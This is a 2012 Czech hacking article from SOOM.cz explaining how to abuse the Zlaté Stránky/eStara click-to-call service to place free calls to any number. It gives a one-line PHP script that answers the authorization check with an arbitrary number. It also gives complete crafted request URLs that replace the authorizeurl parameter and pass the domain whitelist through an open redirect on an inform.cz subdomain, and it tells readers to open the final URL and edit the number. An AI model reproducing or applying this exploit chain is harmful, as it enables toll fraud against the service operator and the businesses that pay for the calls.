Jak volat zdarma na jakékoli číslo prostřednictvím Zlatých Stránek

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Subber
Datum: 8.8.2012
Hodnocení/Hlasovalo: 1.48/31

Je tomu už pěkná řádka let, co společnost Mediatel, vlastník Zlatých Stránek spustila službu volání zdarma. Tenkrát šlo volat na všechna čísla uvedená ve Zlatých Stránkách, postupem času je tato možnost jen pro volání do firem co si za tuto službu zaplatí. Rozhodl sem se podívat na to, jestli je tato možnost napadnutelná a mohu se dovolat všude.

Jako první sem si tedy musel najít nějaký kontakt na který se dá zdarma zavolat. Samotné vyhledání bylo jednoduché a já použil hned tento první kontakt. Zde je ihned možnost kliknout na volat zdarma.

Po kliknutí na Volej zdarma se již dostávám na jiný externí server společnosti estara. Tam mne přivítá pro Zlaté Stránky graficky customizovaný formulář, kde mohu vyplnit svoje telefonní číslo aby byl hovor spojen.


Jakmile vyplním svoje telefonní číslo, tak telefon začne vyzvánět, vyslechnu si znělku, poté začne vyzvánět na druhé straně a hovor je spojen. Mně ale spíše zajímá URL na které se nacházím. Svůj požadavek na server jsem odeslal metodou GET, takže URL adresa musí obsahovat všechny informace jako kam hovor spojit, atd. Pozorně si tedy prohlédneme kde se nacházíme.

http://as00.estara.com/UI/gui.php?donotcache=1344091985240&accountid=200106295025&referrer=http%3A%2F%2Fwww.zlatestranky.cz%2Ffirmy%2FPraha%2FH1203997%2FGold+key+-+otev%25C3%25ADr%25C3%25A1n%25C3%25AD+z%25C3%25A1mk%25C5%25AF%2F&pagetitle=%22Gold+key+-+otev%EDr%E1n%ED+z%E1mk%25u016F%22%2C+%22Praha%22%2C+Z%E1me%25u010Dnictv%ED%2C+z%E1me%25u010Dn%EDci+-+Zlat%E9+Str%E1nky&var1=ZSCZ&var2=YP&authorizeurl=http%3A%2F%2Fas00.estara.com%2Fas%2Fmd5_auth.php%3Fphone%3D420602290290%26md5hash%3D905CF0BFB162F8C459D4637F521F5CF9&template=372081&calltype=webvoicepop&guiid=43834a54eac25&timestamp=1344091828

Zajímavě tedy vypadá zvýrazněná hodnota. Tato URL se zřejmě bude starat o autorizaci požadavku. V této URL je patrné i příslušné telefonní číslo. Zkouším tedy tuto URL dekódovat a přímo načíst.

Kontaktuji tedy URL

http://as00.estara.com/as/md5_auth.php?phone=420602290290&md5hash=905CF0BFB162F8C459D4637F521F5CF9

a dostávám pouze stručnou odpověď v podobě strohého „NO“. Kdo tedy může dostat YES? Nakonec se mi povedlo pomoc9 Google vypátrat ještě další službu využívající click2call od Estara a na ní tento autorizační odkaz. Ten fungoval.

http://allstateagencies.com/AgentLocator/P2TAuthorization.aspx?AgentId=46442f65716246757756303d

Jeho výstup byl prostý: phone=18585690500

Jak vidíme, služba neodpoví YES ale telefonním číslem které se má kontaktovat. Nyní tedy již víme co má autorizační URL odpovědět aby hovor proběhl. Samotné telefonní číslo nikde v jiné proměnné u eStary není, takže je logické že ho musí poskytnout server při autorizaci. Zkusíme tedy vytvořit skript, který také zvládne odpovědět telefonním číslem a proměnnou s autorizační URL upravit. Vytvořil sem tedy tento jednoduchý PHP skript.

<?php echo „phone=“ . $_GET['phone'] ;?>

Tento skript jsem si tedy hodil na svůj server a zkusil ho kontaktovat na následující URL adrese:

http://subber.cz/hacking/phone.php?phone=420737xxxxxx – xxxxxx byly nahrazeny části mého telefonního čísla. Skript vrátil odpovídající výstup. Čísla je třeba uvádět pro ČR s mezinárodní předvolbou 420 ( ve tvaru MSISDN bez + na začátku ). Zkusil sem tedy upravit autorizační URL na následující verzi v požadavku a vše zkusit znovu.

http://as00.estara.com/UI/gui.php?donotcache=1344091985240&accountid=200106295025&referrer=http%3A%2F%2Fwww.zlatestranky.cz%2Ffirmy%2FPraha%2FH1203997%2FGold+key+-+otev%25C3%25ADr%25C3%25A1n%25C3%25AD+z%25C3%25A1mk%25C5%25AF%2F&pagetitle=%22Gold+key+-+otev%EDr%E1n%ED+z%E1mk%25u016F%22%2C+%22Praha%22%2C+Z%E1me%25u010Dnictv%ED%2C+z%E1me%25u010Dn%EDci+-+Zlat%E9+Str%E1nky&var1=ZSCZ&var2=YP&authorizeurl=http://subber.cz/hacking/phone.php?phone=420737xxxxxx&template=372081&calltype=webvoicepop&guiid=43834a54eac25&timestamp=1344091828

Formulář se normálně zobrazil ale při pokusu o spojení vyběhl formulář, na jakých že doménách se můžou volané autorizační skripty nacházet.

Access denied (authorizeurl domain) authorizeurl=http://subber.cz/hacking/phone.php?phone=420737xxxxxx domains=www.zlatestranky.sk,www.zlatestranky.cz,inform.zlatestranky.cz,e-firmy.zlatestranky.sk,www.travelguide.cz,www.inform.cz,www.e-firmy.sk,www.zlatestranky.cz.bat.eurodir.eu,eurodir.eu

Co teď? Nejjednodušším řešením by to bylo vzdát. Nebo projít všechny weby na těchhle doménách a najít nějakou další chybu. Řešení musí existovat. Nakonec sem našel mírný zásah naděje na informu. Tato naděje se posléze proměnila ve vítězství. Nebudeme to protahovat – na subdoméně informu se nachází katalog, kde je u firem uváděna i webová adresa odkazující ale na redirect. V případě, že na nějakou URL chci přistoupit mne tam přesměruje až redirect příslušným HTTP kódem. A to zřejmě server od eStara považuje stále za tu jednu a samou doménu a hovor schválí.

http://webmonitor.inform.cz/hit/6193.aspx?rewpage=subber.cz/hacking/phone.php?phone=420737xxxxxx

Takže pro vytočení vlastního telefonního čísla musíte otevřít tuto URL. Volané číslo se upraví přímo v URL.

http://as00.estara.com/UI/gui.php?donotcache=1344091985240&accountid=200106295025&referrer=http%3A%2F%2Fwww.zlatestranky.cz%2Ffirmy%2FPraha%2FH1203997%2FGold+key+-+otev%25C3%25ADr%25C3%25A1n%25C3%25AD+z%25C3%25A1mk%25C5%25AF%2F&pagetitle=%22Gold+key+-+otev%EDr%E1n%ED+z%E1mk%25u016F%22%2C+%22Praha%22%2C+Z%E1me%25u010Dnictv%ED%2C+z%E1me%25u010Dn%EDci+-+Zlat%E9+Str%E1nky&var1=ZSCZ&var2=YP&authorizeurl=http://webmonitor.inform.cz/hit/6193.aspx?rewpage=subber.cz/hacking/phone.php?phone=420739xxxxxx&template=372081&calltype=webvoicepop&guiid=43834a54eac25&timestamp=1344091828

Poté stačí ve formuláři zadat vlastní telefonní číslo a dochází ke spojení.



Zdroj: http://www.subber.cz